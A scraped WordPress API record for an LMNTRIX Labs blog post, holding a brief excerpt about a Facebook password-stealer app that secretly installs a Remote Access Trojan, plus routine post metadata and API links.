SourceURL:https:\/\/www.lmntrix.com\/Lab\/Lab_info.php?id=60&amp;url=Instant%20Karma:%20Facebook%20password%20stealer%20app%20drops%20Remote%20Access%20Trojan LMNTRIX Labs LMNTRIX Labs A new Facebook password stealer campaign is luring victims with the offer of hijacking Facebook password credentials. In a beautiful case of &lsquo;what goes around comes around&rsquo;, the application also drops malware in the background on the user&rsquo;s machine, opening the would-be snooper [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1792,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-1772","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/1772","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=1772"}],"version-history":[{"count":3,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/1772\/revisions"}],"predecessor-version":[{"id":4150,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/1772\/revisions\/4150"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/1792"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=1772"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=1772"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=1772"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}